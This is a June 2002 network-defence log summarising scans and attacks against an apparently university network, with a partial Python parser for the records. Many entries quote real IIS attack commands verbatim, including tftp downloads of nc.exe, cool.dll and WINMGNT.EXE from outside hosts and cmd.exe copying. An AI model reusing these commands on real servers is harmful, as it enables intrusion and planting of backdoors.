Short summary of some of the attacks against us for June 2002

time EASTERN  source_ip[:port]  (dns name, if any)  attack/scan/notes

2002/06/01-08:09:07.26 211.21.75.50 (CHTD, Chunghwa Telecom Co.,Ltd.,TAIPEI,TW) scan net for port 22
2002/06/01-09:45:14.05 202.163.198.234 (Boot Camp Internet Center,MANILA,PH) portscan 132.235.16.206
2002/06/01-21:59:19.28 213.30.188.2 (COMPLETEL SAS France) attack IIS server with command: tftp%20-i%20132.110.2.10%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/02-02:57:48.52 148.235.37.135 (customer-148-235-37-135.uninet.net.mx) scan net for port 515
2002/06/02-06:11:09.90 212.194.141.70 (lns07v-10-70.w.club-internet.fr) scan net for port 21
2002/06/02-06:40:18.04 12.162.131.50 (EISTREAM ,TX,US) scan net for port 1433
2002/06/02-19:25:03.32 24.94.229.45 (okc-94-229-45.mmcable.com) attack Unix web server: attempt to read /etc/passwd via CGI programs
2002/06/02-21:00:51.86 65.93.229.48 (Quebec-HSE-ppp3621825.sympatico.ca) scan net for port 21
2002/06/02-21:21:43.25 24.197.74.196 (wv-pkbrg-ubr-a-024-197-074-196.charterwv.net) ping scan of net
2002/06/02-21:23:21.26 24.197.74.196 (wv-pkbrg-ubr-a-024-197-074-196.charterwv.net) DNS named version scan of net
2002/06/02-21:28:59.09 24.197.74.196 (wv-pkbrg-ubr-a-024-197-074-196.charterwv.net) scan selected ips for ports 80,443,1080,8000,213,21,25,79,13
2002/06/02-22:28:04.71 61.147.48.77 (CHINANET Jiangsu province network,CN) still trying to use 132.235.1.70 as a DNS server
2002/06/03-02:30:56.11 193.48.37.4 (test.ensait.fr) attack IIS server with command: tftp.exe/?+-i+136.142.165.42+GET+2.tmp+c:/recycler/_/_tmp/2.tmp
2002/06/03-02:34:15.03 212.187.98.98 (c98098.upc-c.chello.nl) portscan 132.235.18.211
2002/06/03-02:59:12.02 207.140.118.113 (Dot Foods,IL,US) scan net for port 1433
2002/06/03-05:55:36.61 202.70.199.68 (India Online Network Ltd.,MUMBAI,IN) scan net for port 1433
2002/06/03-05:55:40.31 202.70.199.68 (India Online Network Ltd.,MUMBAI,IN) scan net for port 1433
2002/06/03-09:53:47.75 24.208.182.57 (dhcp024-208-182-057.columbus.rr.com) scan selected ips for port 1521
2002/06/03-11:33:18.52 200.158.46.24 (200-158-46-24.dsl.telesp.net.br) scan net for port 139
2002/06/03-13:23:42.39 194.24.240.8 (VUMS software,PRAGUE,CZ) scan net for port 21
2002/06/03-15:51:39.41 62.194.56.158 (node-c-389e.a2000.nl) attack IIS server 132.235.18.115 with command: tftp+-i+62.194.56.158+get+ServUDaemon.ini+c:\temp\exp4\tmp\ServUDaemon.ini
2002/06/03-16:12:18.06 212.211.87.29 (fra-tgn-oyh-vty29.as.wcom.net) scan net for port 23
2002/06/03-16:12:18.08 212.211.87.29:23 (fra-tgn-oyh-vty29.as.wcom.net) scan net for port 23
2002/06/03-16:17:30.37 212.211.87.29:23 (fra-tgn-oyh-vty29.as.wcom.net) buffer overflow attack on selected ips, port 6112
2002/06/03-16:17:42.06 212.211.87.29 (fra-tgn-oyh-vty29.as.wcom.net) CDE dtspcd exploit attempt
2002/06/03-20:24:47.59 202.185.203.66:22 (Taman Teknologi Malaysia,KUALA LUMPUR,MY) scan net for port 22
2002/06/03-21:21:40.00 61.147.48.65 (CHINANET Jiangsu province network,CN) still trying to use 132.235.1.70 as a DNS server
2002/06/04-01:01:53.60 131.164.245.23 (0x83a4f517.abnxx3.adsl-dhcp.tele.dk) scan net for port 111, rpc.statd (statdx) exploit attempt
2002/06/04-02:13:30.85 62.163.164.53 (a164053.upc-a.chello.nl) scan net for port 1433
2002/06/04-06:46:25.00 63.164.240.12 (cblmdm63-164-240-12.buckeye-express.com) scan net for port 1433
2002/06/04-06:46:25.03 63.164.240.12 (cblmdm63-164-240-12.buckeye-express.com) scan net for port 1433
2002/06/04-07:20:17.10 61.156.9.133 (CHINANET Shandong province network,CN) scan net for port 111
2002/06/04-08:05:26.53 61.177.251.125 (CHINANET jiangsu province network,CN) attack IIS server with command: tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/04-08:19:58.38 211.114.0.252 (CIVIL ENGINEERING RESEARCH INFORMATION CENTER,KYONGGI,KR) scan net for port 1433
2002/06/04-08:20:09.89 211.114.0.252 (CIVIL ENGINEERING RESEARCH INFORMATION CENTER,KYONGGI,KR) scan net for ports 515, 53
2002/06/04-10:15:49.09 61.156.9.133 (CHINANET Shandong province network,CN) scan net for port 111, sadmind buffer overflow attempts
2002/06/04-12:17:47.51 203.199.70.235 (Videsh Sanchar Nigam Ltd - India,BOMBAY) scan net with large ICMP packets
2002/06/04-15:27:52.28 24.80.76.244 (h24-80-76-244.vn.shawcable.net) scan net for port 515
2002/06/04-20:37:08.89 208.180.124.10 (cdm-208-124-10-geor.cox-internet.com) scan net for port 1433
2002/06/04-21:12:02.34 67.38.164.215 (adsl-67-38-164-215.dsl.wotnoh.ameritech.net) scan net for port 1214
2002/06/04-21:36:53.60 205.177.13.223:1345 (CAIS Internet,McLean,VA,US) scan net for port 1345
2002/06/05-01:48:43.17 210.186.181.212 (TMnet Telekom Malaysia,MY) finger 123@topdog, try to log in as the quota template account
2002/06/05-07:27:36.47 202.205.136.37 (National Education Examinations Agency,CN) scan net for port 1433
2002/06/05-11:09:00.38 132.235.94.25 (unregistered host in ohiou.edu) scan net for port 41524 UDP
2002/06/05-16:28:38.00 213.30.188.2 (ns1.sqp.fr) attack IIS server with command: tftp%20-i%20132.110.2.10%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/06-02:39:38.00 63.81.251.131 (Financial Solutions, Inc.,IL,US) scan net for ports 21,22,23
2002/06/06-02:39:47.19 63.81.251.131 (Financial Solutions, Inc.,IL,US) scan net for ports 22,21,23
2002/06/06-13:23:56.94 211.215.87.25 (Hanaro Telecom Co.,SEOUL,KR) scan net for port 1433 (SQL Server attacks)
2002/06/06-13:33:20.95 63.136.112.117 (63-136-112-117.ADSL.CandW.ky) scan net for port 21, anonymous FTP attacks
2002/06/07-02:12:37.31 61.177.251.125 (CHINANET jiangsu province network,CN) scan net for port 80, also 139,445 on selected ips
2002/06/07-02:21:51.56 61.177.251.125 (CHINANET jiangsu province network,CN) attack IIS server with command: tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/07-05:08:24.34 202.184.225.16 (202-184-225-16.itm.edu.my) scan net with large ICMP packets
2002/06/07-07:45:01.35 24.226.250.142 (Cogeco Cable Inc. / St-Hyacinthe,CA) scan net for ports 139,445,137
2002/06/07-07:59:26.12 32.102.44.133 (slip-32-102-44-133.az.us.prserv.net) scan net for port 25
2002/06/07-08:53:29.43 203.195.193.34 (203-195-193-34.now-india.net.in) rpc.statd (statdx) exploit attempt
2002/06/07-10:37:58.26 66.13.32.92 (bdsl.66.13.32.92.gte.net) scan net for port 21
2002/06/07-13:22:58.87 193.243.226.22 (Financial Solutions, Inc.,IL,US) scan net for port 1524
2002/06/07-18:24:48.73 211.169.249.164 (KR) scan net for port 1433
2002/06/07-23:26:57.98 211.108.88.239 (KR) scan net for port 1433
2002/06/08-02:26:28.61 200.193.230.29 (200-193-230-029-gnace7001.dsl.telebrasilia.net.br) telnet and FTP buffer overflow attacks
2002/06/08-02:57:18.66 209.246.81.188 (dialup-209.246.81.188.Dial1.NewYork1.Level3.net) attack IIS server with command: tftp.exe%20-i%20209.246.81.188%20get%20nc.exe%20c:\inetpub\scripts\nc.exe
2002/06/08-06:01:33.88 210.77.137.162 (21 ViaNet (China),Inc.,BEIJING,CN) attack IIS server with command: tftp%20-i%20132.147.160.68%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/08-07:47:27.82 151.29.86.191 (ppp-191-86.29-151.libero.it) scan several ips for ports 21,22,23, ping
2002/06/08-09:39:14.92 212.143.221.169 (ADSLP221-NV64A-p169.adsl.netvision.net.il) attack IIS server with command: tftp.exe+"-i"+212.143.221.169+get+WINMGNT.EXE+c:\InetPub\scripts\WINMGNT.EXE
2002/06/08-12:37:14.16 203.89.128.30 (ISP Project by BMS Priority International (Pvt.) Ltd.,PK) scan net for port 21
2002/06/08-15:55:57.84 216.102.239.34 (adsl-216-102-239-34.dsl.lsan03.pacbell.net) scan net for port 1433
2002/06/08-16:29:54.80 80.145.108.162 (p50916CA2.dip.t-dialin.net) portscan ace
2002/06/08-20:32:06.89 200.23.18.163 (Universidad Autonoma de la Laguna,Torreon,Coahuila,MX) scan net for port 21, anonymous FTP attack
2002/06/08-20:32:14.43 61.133.119.130 (shandong weihai traffic cop detachment,CN) scan net for port 21
2002/06/08-20:32:16.86 24.232.207.118 (OL118-207.fibertel.com.ar) scan net for port 21
2002/06/08-22:41:34.97 61.177.251.125 (CHINANET jiangsu province network,CN) massive IIS server attacks with commands: tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll and tftp%20-i%20132.235.32.73%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/09-04:46:49.31 210.64.188.113 (h113-210-64-188.seed.net.tw) scan net for port 1433
2002/06/09-04:46:51.14 210.64.188.113 (h113-210-64-188.seed.net.tw) scan net for port 1433
2002/06/09-06:52:06.18 203.129.127.3 (APNIC, AU?) scan net for port 111
2002/06/09-08:19:51.31 12.248.83.114 (12-248-83-114.client.attbi.com) scan net for port 1433
2002/06/10-00:26:46.24 80.13.249.245 (APuteaux-112-1-2-245.abo.wanadoo.fr) scan net for port 21
2002/06/10-00:35:47.36 211.196.77.66 (KR) scan net for port 22
2002/06/10-02:42:57.56 61.177.251.125 (CHINANET jiangsu province network,CN) massive IIS server attacks with command
2002/06/10-03:49:24.82 217.34.209.1 (host217-34-209-1.in-addr.btopenworld.com) attack IIS server with command: cmd.exe?/c+mkdir+C:\RECYCLER\S-1-5-21-1984716614-615581561-1606240830-1000\$winnt\$sys\hacked_by_trc_pub5tr0_maker_v0_99_beta
2002/06/10-06:50:00.69 61.177.251.125 (CHINANET jiangsu province network,CN) IIS attack, tftp to 132.235.32.101
2002/06/10-10:07:22.06 24.46.65.109 (ool-182e416d.dyn.optonline.net) scan net for port 1433
2002/06/10-13:03:30.36 80.14.66.44 (AAnnecy-201-1-3-44.abo.wanadoo.fr) scan net for port 21
2002/06/10-13:27:10.51 213.177.142.218 (adsl-142-218.wanadoo.be) scan net for ports 137,138,445, ping
2002/06/10-19:09:41.02 80.13.249.223 (APuteaux-112-1-2-223.abo.wanadoo.fr) scan net for port 21
2002/06/10-19:15:28.12 210.77.137.57 (21 ViaNet (China),Inc.,CN) scan net for port 1433
2002/06/10-20:47:28.59 63.136.112.95 (Cable and Wireless LTD - Cayman,CAYMAN ISLANDS,KY) scan net for port 1080
2002/06/10-20:59:03.32 24.168.132.250 (24-168-132-250.nj.rr.com) scan net for port 1433
2002/06/10-21:39:58.17 200.181.83.74 (200-181-083-074-cbace201.dial.telebrasilia.net.br) ping scan of net
2002/06/11-02:25:27.87 4.63.63.233 (lsanca1-ar23-4-63-063-233.lsanca1.dsl-verizon.net) attack IIS server with command: copy ...cmd.exe+c:\inetpub\scripts\testing.exe%
2002/06/11-03:13:11.85 216.221.59.66 (dsl-59-66.aei.ca) multiple types of IIS attacks against one ip
2002/06/11-07:33:43.59 216.208.212.129 (Rivieres-ppp31107.qc.sympatico.ca) scan net for ports 139,445
2002/06/11-10:40:40.13 212.199.237.39 (Golden Lines,IL) attack IIS server with command: tftp.exe+"-i"+212.199.237.39+get+WINMGNT.EXE+c:\Inetpub\WINMGNT.EXE
2002/06/11-12:56:35.63 66.197.236.172 (Network Operations Center Inc.,PA,US) scan net for port 22
2002/06/11-14:58:07.27 212.179.205.240 (bzq-205-240.red.bezeqint.net) attack IIS server with command: tftp.exe+"-i"+212.179.205.240+get+servudaemon.ini+c:\inetpub\servudaemon.ini
2002/06/11-15:45:52.10 203.248.195.182 (KR) scan net for port 21
2002/06/11-16:13:28.10 212.57.134.129 (Magnitogorsk State Pedagogical Institute,RU) scan net for port 111
2002/06/11-16:54:37.85 203.199.70.210 (Videsh Sanchar Nigam Ltd - India) scan net with large ICMP packets
2002/06/11-20:19:48.30 80.15.192.157 (APuteaux-112-1-3-157.abo.wanadoo.fr) scan net for port 21
2002/06/12-02:41:35.05 216.190.255.220 (Wasatch Hosting,UT,US) scan net for port 25
2002/06/12-03:58:46.53 217.128.91.97 (AToulouse-105-1-10-97.abo.wanadoo.fr) scan net for port 21
2002/06/12-04:03:10.28 217.128.91.97 (AToulouse-105-1-10-97.abo.wanadoo.fr) scan net for port 21
2002/06/12-04:39:16.67 212.209.107.19 (Cycore AB,SE) attack IIS server with command: tftp.exe?-i+213.51.172.78+GET+Winmgnt.exe+c:\inetpub\scripts\Winmgnt.exe?bbatt=Y?bbatt=Y?bbatt=Y
2002/06/12-07:55:18.04 218.24.129.161 (CHINANET liaoning province network,CN) scan net for ports 1080,25
2002/06/12-08:09:44.36 80.14.245.239 (AMontpellier-102-1-3-239.abo.wanadoo.fr) scan net for port 21, anonymous FTP attacks
2002/06/12-08:29:34.76 210.127.240.66 (Haein Soft,SEOUL,KR) scan net for port 1433
2002/06/12-10:55:00.40 211.147.112.92 (capital network CO., LTD,CN) scan net for port 21
2002/06/12-13:43:01.19 172.183.217.105 (ACB7D969.ipt.aol.com) scan net for port 21, anonymous FTP attacks
2002/06/12-15:46:47.36 212.254.98.207 (adsl-98-207-glattbrugg1.tiscalinet.ch) ping scan of net
2002/06/12-16:13:44.92 80.200.224.109 (80-200-224-109.adsl.powered-by.skynet.be) attack several IIS servers all day with command: tftp+-i+80.200.224.109+GET+nc.exe+nc.exe
2002/06/12-17:13:43.51 203.199.70.235 (Videsh Sanchar Nigam Ltd - India) scan net with large ICMP packets
2002/06/12-18:18:56.81 212.254.248.17 (adsl-248-17-glattbrugg2.tiscalinet.ch) scan net for port 21
2002/06/12-18:27:47.62 212.254.97.220 (adsl-97-220-glattbrugg1.tiscalinet.ch) scan net for port 21
2002/06/12-19:23:18.57 217.136.42.155 (adsl-43675.turboline.skynet.be) scan net for port 21
2002/06/12-19:26:28.34 218.24.129.161 (CHINANET liaoning province network,CN) scan net for port 25
2002/06/13-01:05:43.54 198.233.22.103 (greybox.toolcase.com) scan net for port 21
2002/06/13-04:25:38.43 80.14.106.161 (ANice-104-1-5-161.abo.wanadoo.fr) scan net for port 21
2002/06/13-05:18:06.46 210.93.198.155 (TERRAINNO CO., LTD,SEOUL,KR) scan net for ports 21,139,445
2002/06/13-05:38:49.05 210.93.198.155 (TERRAINNO CO., LTD,SEOUL,KR) scan net for ports 21,139,445
2002/06/13-12:00:10.95 217.136.243.53 (adsl-95029.turboline.skynet.be) scan net for port 21
2002/06/13-12:36:34.13 195.239.154.86 (Sovam Teleport,RU) scan net for ports 80,8080,3128
2002/06/13-14:51:34.93 216.132.133.115 (Media Chase,LA,US) scan net for port 1433
2002/06/13-14:56:21.97 68.62.123.22 (pcp01099678pcs.tsclos01.al.comcast.net) attack IIS server with command: tftp.exe+"-i"+68.62.123.22+get+WINMGNT.EXE+c:\WINMGNT.EXE
2002/06/13-17:31:04.48 80.15.23.214 (ASte-Genev-Bois-109-1-2-214.abo.wanadoo.fr) scan net for port 21
2002/06/13-19:30:32.33 43.232.18.20 (usen-43x232x18x20.ap-USEN.usen.ad.jp) scan net for port 22
2002/06/13-20:31:51.56 61.103.103.11 (HITELECOM Kyonggi,KYONGGI,KR) scan net for port 111, sadmind buffer overflow attempt
2002/06/13-21:55:48.67 212.195.132.41 (lns17m-9-41.w.club-internet.fr) scan net for port 21
2002/06/14-01:09:10.06 63.136.112.171 (6A3-136-112-171.ADSL.CandW.ky) scan net for port 21
2002/06/14-01:23:01.98 61.207.146.222 (p2222-ipad01fukuhanazo.fukushima.ocn.ne.jp) scan net for port 1433
2002/06/14-03:25:04.80 61.177.251.125 (CHINANET jiangsu province network,CN) attack IIS server with command: ...132.235.32.73%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/14-05:57:04.78 61.177.251.125 (CHINANET jiangsu province network,CN) scan net for port 80, then some ips on 137
2002/06/14-08:19:40.11 65.160.170.2 (Syncor International Corp.,CA,US) scan net for port 1433
2002/06/14-09:56:59.53 65.35.197.70 (6535197hfc70.tampabay.rr.com) ping scan of net
2002/06/14-10:00:44.10 65.160.170.2 (Syncor International Corp.,CA,US) try to log in to SQL Server as user sa
2002/06/14-13:18:24.86 213.30.188.2 (ns1.sqp.fr) scan net for port 80, attack IIS server with command: tftp%20-i%20132.110.2.10%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/14-15:36:44.07 203.80.227.2 (203080227002.ctinets.com) scan net for port 22
2002/06/14-20:44:51.43 211.180.125.27 (Kyungbooktechnopark,KR) scan net for port 21
2002/06/15-14:48:32.44 24.200.226.160 (modemcable160.226-200-24.que.mc.videotron.ca) scan selected ips for port 21
2002/06/15-22:14:58.75 211.75.197.213 (Chuan Hsin Yu Feng Enterprises Co., Ltd.,TW) scan net for port 1433
2002/06/16-08:34:03.92 194.206.91.3 (JET LAG,LYON,FR) scan net for port 6112
2002/06/16-10:25:56.40 203.220.132.104 (dialup-104.132.220.203.acc01-geor-bat.comindico.com.au) IIS server attacks, including
2002/06/16-10:46:34.93 202.107.54.51 (CHINANET liaoning province network,CN) attack IIS server with command: ftp%20-i%20132.198.155.237%20GET%20cool.dll
2002/06/16-14:53:18.00 211.254.142.199 (KR) scan net for port 21
2002/06/16-19:04:12.85 61.138.232.12 (CHINANET xinjiang province network,CN) scan net for port 111, sadmind buffer overflow attempt
2002/06/16-20:08:58.63 194.206.91.3 (JET LAG,LYON,FR) scan net for port 111
2002/06/17-04:09:40.48 204.94.162.82 (TELECOM LABS INC,OR,US) scan net for port 1433
2002/06/17-05:52:38.90 204.94.162.82 (TELECOM LABS INC,OR,US) try to log in to SQL Server as user sa
2002/06/17-10:05:25.12 195.239.154.86 (Sovam Teleport,RU) scan net for ports 3128,8080,80
2002/06/17-10:28:36.44 194.226.201.199 (Dizla Networks,St.Petersburg,RU) scan net for ports 8080,3128,1080
2002/06/17-12:42:02.21 218.25.133.51 (CHINANET liaoning province network,CN) scan net for port 25
2002/06/17-13:31:17.65 202.112.13.50 (Tsinghua University,CN) hammer DNS from port 40622 with lookups for mailst.xjtu.edu.cn
2002/06/17-14:46:43.91 148.223.141.50 (xalapa.cobaev.edu.mx) scan net for port 21
2002/06/17-19:25:52.47 212.74.122.231 (Tiscali UK Limited,GB) scan net for port 1433
2002/06/17-19:59:58.58 12.232.169.251 (12-232-169-251.client.attbi.com) DNS named version scan of net, portmap listing
2002/06/17-20:01:44.78 12.232.169.251 (12-232-169-251.client.attbi.com) attack multiple ips: ping scan, telnet and FTP logins as root/root, guest, ftp, anonymous; various SMB probes/attacks
2002/06/17-21:29:21.52 61.177.251.125 (CHINANET jiangsu province network,CN) scan net for ports 80,139,445, attack IIS servers with command: tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/18-05:58:32.97 61.177.251.125 (CHINANET jiangsu province network,CN) scan net for port 80, attack IIS server with command: tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/18-07:30:37.90 194.226.201.199 (Dizla Networks,St.Petersburg,RU) scan several ips for ports 8080,3128,1080
2002/06/18-13:42:12.17 62.2.193.59 (client62-2-193-59.hispeed.ch) sensepost attack on web server
2002/06/18-16:16:46.69 210.97.127.250 (Dukhyun Elementary School,KR) scan net for port 21
2002/06/18-20:35:44.29 194.85.32.18 (ns.runnet.ru) scan several ips for ports 8080,3128,1080
2002/06/18-20:55:14.31 12.232.169.251 (12-232-169-251.client.attbi.com) scan net for ports 21,135,137,139
2002/06/18-22:44:20.34 61.177.251.125 (CHINANET jiangsu province network,CN) attack IIS server with command: tftp%20-i%20132.235.32.101%20GET%20cool.dll%20d:\httpodbc.dll; a large number of additional IIS attacks through 2002/06/19-06:53:59.33
2002/06/18-23:35:13.69 195.16.129.20 (100mbps,MADRID,ES) scan net for port 1433
2002/06/19-00:44:36.55 80.14.22.220 (ARouen-102-1-3-220.abo.wanadoo.fr) scan net for port 21
2002/06/19-05:33:11.04 80.15.23.214 (ASte-Genev-Bois-109-1-2-214.abo.wanadoo.fr) scan net for port 21
2002/06/19-08:28:44.49 202.88.149.134 (Hathway IP Over Cable Internet Access Service,IN) attack IIS server with command: tftp%20-i%20132.147.133.167%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/19-08:34:31.93 61.160.151.205 (CHINANET jiangsu province network,CN) attack IIS server with command: tftp%20-i%20132.240.9.150%20GET%20cool.dll%20e:\httpodbc.dll
2002/06/19-08:45:32.24 217.225.86.142 (pD9E1568E.dip.t-dialin.net) scan net for port 21
2002/06/19-12:31:23.19 80.11.24.98 (AOrleans-201-1-1-98.abo.wanadoo.fr) scan net for port 21
2002/06/19-21:02:57.89 61.177.251.125 (CHINANET jiangsu province network,CN) massive IIS attack with command: tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/19-21:26:52 132.235.19.35 (OU) portscan 132.235.17.17, ports 32768-65535
2002/06/19-22:35:28.35 194.85.32.18 (ns.runnet.ru) scan net for ports 8080,1080,3128
2002/06/19-23:28:11.06 210.217.28.38 (KR) scan net for port 1524
2002/06/20-06:54:02.39 61.160.151.181 (CHINANET jiangsu province network,CN) IIS attacks with command: tftp%20-i%20132.240.9.150
2002/06/20-07:24:42.16 139.67.33.4 (Panther4424.eiu.edu) attack IIS server with command: copy+c:\winnt\system32\cmd.exe+gooni.exe
2002/06/20-08:38:36.24 213.123.49.230 (host213-123-49-230.in-addr.btopenworld.com) scan net for SMB C$ access
2002/06/20-09:51:34.26 12.38.64.29 (wis-ppp-1045.westelcom.com) scan net for SMB C$ access
2002/06/20-10:36:20.13 216.160.238.191 (bdslppp191.slkc.uswest.net) scan net for SMB C$ access
2002/06/20-10:42:35.20 212.211.87.3 (fra-tgn-oyh-vty3.as.wcom.net) scan net for port 21, dtspcd buffer overflow attacks on several hosts
2002/06/20-10:42:35.44 212.211.87.3 (fra-tgn-oyh-vty3.as.wcom.net) scan net for ports 21,6112,1524, buffer overflow attacks
2002/06/20-11:03:32.97 216.204.134.35 (dialin134-35.pwm.neonline.net) scan net for SMB C$ access
2002/06/20-11:18:49.61 61.216.64.39 (61-216-64-39.HINET-IP.hinet.net) probe SMB on 132.235.16.97
2002/06/20-12:25:36.54 203.200.148.123 (Videsh Sanchar Nigam Ltd - India) try to log in to 132.235.17.17 as root, guest, shivdev
2002/06/20-12:54:23.27 203.213.60.3 (syd-ts8-2600-003.tpgi.com.au) scan net for SMB C$ access
2002/06/20-14:34:25.56 12.90.11.142 (142.philadelphia-15-20rs.pa.dial-access.att.net) scan net for SMB C$ access
2002/06/20-15:35:35.87 24.187.125.160 (ool-18bb7da0.dyn.optonline.net) scan net for ports 137,139,445,80
2002/06/20-18:52:32.37 210.230.200.61 (BROOKLANDS CO.,LTD.,JP) scan net for port 22; 172.181.206.205 anonymous FTP attacks
2002/06/20-21:19:03.54 80.8.242.232 (ca-marseille-77-232.abo.wanadoo.fr) scan net for port 21
2002/06/21-03:33:08.19 24.66.94.142 (px3nr.wp.shawcable.net) attack IIS server with command: tftp.exe+%22-i%22+24.85.76.10+get+nc.exe+c:\nc.exe
2002/06/21-06:11:02.94 80.136.17.238 (p508811EE.dip.t-dialin.net) hammer web server 132.235.18.115
2002/06/21-14:43:45.13 65.86.149.68 ( ) scan net for port 23
2002/06/21-17:21:30.02 211.95.72.22 ( ) scan net for port 22
2002/06/21-23:20:14.03 63.208.234.195 ( ) scan net for port 1214
2002/06/22-02:23:07.12 24.97.176.140 ( ) scan net for port 21
2002/06/22-09:35:52.04 217.128.32.191 ( ) scan net for port 21
2002/06/22-14:49:37.22 61.33.27.10 ( ) scan net for port 21
2002/06/22-15:18:27.21 211.185.158.1 ( ) scan net for port 1433
2002/06/22-16:42:03.10 62.219.204.224 ( ) scan net for port 21
2002/06/22-20:40:08.10 63.136.113.2 ( ) scan net for ports 139,445,80
2002/06/22-22:26:04.06 161.58.90.165 ( ) scan net for port 139
2002/06/23-18:40:18.32 203.116.235.226 ( ) scan net for ports 22,23
2002/06/24-01:16:50.78 203.166.29.198 ( ) scan net for port 1524
2002/06/24-03:37:33.89 203.149.149.189 ( ) scan net for port 21
2002/06/24-11:49:15.13 205.252.89.25 ( ) scan net for port 6112
2002/06/24-17:39:38.17 211.63.142.57 ( ) scan net for port 1433
2002/06/24-21:51:28.15 211.196.47.4 ( ) scan net for port 1433
2002/06/24-23:37:49.18 64.246.26.137 ( ) scan net for port 21
2002/06/25-00:47:18.19 12.254.177.80 ( ) scan net for port 25
2002/06/25-01:20:02.42 129.59.202.18 ( ) scan net for port 139
2002/06/25-05:14:30.31 80.14.180.238 ( ) scan net for port 21
2002/06/25-09:50:42.43 24.208.182.19 ( ) scan net for 204 ports
2002/06/25-16:13:27.54 210.18.10.70 ( ) scan net for port 21
2002/06/25-18:12:23.14 80.14.210.25 ( ) scan net for ports 445,21,139
2002/06/26-03:37:43.74 218.25.133.55 ( ) scan net for port 25
2002/06/26-14:49:24.04 66.191.112.172 ( ) scan net for port 1433
2002/06/26-22:04:03.07 200.203.238.253 ( ) scan net for port 21
2002/06/27-03:35:31.15 209.47.27.187 ( ) scan net for ports 445,139
2002/06/27-12:56:38.48 164.77.240.178 (ENTEL CHILE S.A.,SANTIAGO,CL) multiple attempts to fetch the passwd file via anonymous FTP, through 2002/06/27-20:17:01.23
2002/06/27-13:33:31.06 193.13.73.138 ( ) scan net for ports 21,22
2002/06/27-13:55:22.45 168.103.224.38 ( ) scan net for ports 8080,1080,3128
2002/06/27-15:54:49.59 80.15.150.44 ( ) scan net for port 21
2002/06/27-22:47:47.41 210.97.36.2 ( ) scan net for port 1433
2002/06/28-08:08:26.08 172.181.138.221 ( ) scan net for port 1433
2002/06/28-13:59:38.10 80.11.175.121 ( ) scan net for port 1433
2002/06/28-14:44:31.05 212.68.242.60 ( ) scan net for port 1433
2002/06/28-17:12:46.07 200.34.38.11 ( ) scan net for port 21
2002/06/29-04:53:25.51 62.220.2.22 ( ) scan net for port 21
2002/06/29-06:05:43.13 130.39.224.175 ( ) scan net for port 111
2002/06/29-07:09:42.11 65.186.43.201 ( ) scan net for port 1214
2002/06/29-16:38:41.91 64.69.92.2 (92.2.novustelecom.net) attack IIS servers with command: tftp.exe+%22-i%22+64.69.92.2+get+nc.exe+c:\nc.exe
2002/06/30-00:59:11.56 67.250.110.141 (1Cust141.tnt1.kennewick.wa.da.uu.net) attack IIS servers with command: tftp+-i+%2067.250.110.141+GET+TzoLibr.dll+c:\inetpub\wwwroot\_private\TzoLibr.dll
2002/06/30-11:44:43.91 212.64.111.197 (9dyn197.ztm.casema.net) attack IIS servers with command: tftp+-i+212.64.111.197+get+servud~1.ini+c:\winnt\system32\ServUDaemon.ini
2002/06/30-12:12:35.81 65.239.90.211 (1Cust211.tnt5.kennewick.wa.da.uu.net) attack IIS servers with command: tftp+-i+%2065.239.90.211+GET+TzoLibr.dll+c:\inetpub\wwwroot\_private\TzoLibr.dll
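The record format above (time, source IP with optional port, a parenthesised owner or reverse-DNS name, then free-form notes) is regular enough to machine-read, and the interesting part of the IIS entries is the URL-encoded tftp command the attacker pushed through cmd.exe: it names the host the payload is fetched from, the file, and where on the web server it is dropped. The following is an added example, not part of the original summary or any tool its author used. It assumes each record sits on its own line with the "1."/"2." continuations joined, and its sample input is a handful of records copied from the list above; the functions parse_record, tftp_drop, scanned_ports and summarize are names chosen here, not anything from the page.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote_plus

# Constructed sample: records copied from the June 2002 summary above, one record
# per line (the summary's "1." / "2." continuation lines merged back together).
SAMPLE_LOG = """\
2002/06/01-21:59:19.28 213.30.188.2 (COMPLETEL SAS France) attack IIS server with command: tftp%20-i%20132.110.2.10%20GET%20cool.dll%20c:\\httpodbc.dll
2002/06/02-06:40:18.04 12.162.131.50 (EISTREAM ,TX,US) scan net for port 1433
2002/06/03-16:12:18.08 212.211.87.29:23 (fra-tgn-oyh-vty29.as.wcom.net) scan net for port 23
2002/06/08-06:01:33.88 210.77.137.162 (21 ViaNet (China),Inc.,BEIJING,CN) attack IIS server with command: tftp%20-i%20132.147.160.68%20GET%20cool.dll%20c:\\httpodbc.dll
2002/06/08-09:39:14.92 212.143.221.169 (ADSLP221-NV64A-p169.adsl.netvision.net.il) attack IIS server with command: tftp.exe+"-i"+212.143.221.169+get+WINMGNT.EXE+c:\\InetPub\\scripts\\WINMGNT.EXE
2002/06/10-13:27:10.51 213.177.142.218 (adsl-142-218.wanadoo.be) scan net for ports 137,138,445, ping
2002/06/21-14:43:45.13 65.86.149.68 ( ) scan net for port 23
"""


@dataclass
class Record:
    stamp: str              # Eastern time as written: YYYY/MM/DD-HH:MM:SS.ff
    src_ip: str
    src_port: Optional[int]
    name: str               # reverse DNS / whois owner; "" when the log has "( )"
    notes: str


# timestamp, IPv4, optional :port, then the opening "(" of the name field
_HEAD = re.compile(
    r"^(\d{4}/\d{2}/\d{2}-\d{2}:\d{2}:\d{2}(?:\.\d+)?)\s+"
    r"(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?\s+\("
)


def parse_record(line: str) -> Optional[Record]:
    """Parse one summary line; return None for lines that are not records."""
    m = _HEAD.match(line)
    if not m:
        return None
    # The name field may itself contain parentheses, e.g. "(21 ViaNet (China),...)",
    # so walk forward counting depth instead of stopping at the first ")".
    depth, i = 1, m.end()
    while i < len(line) and depth:
        depth += {"(": 1, ")": -1}.get(line[i], 0)
        i += 1
    if depth:
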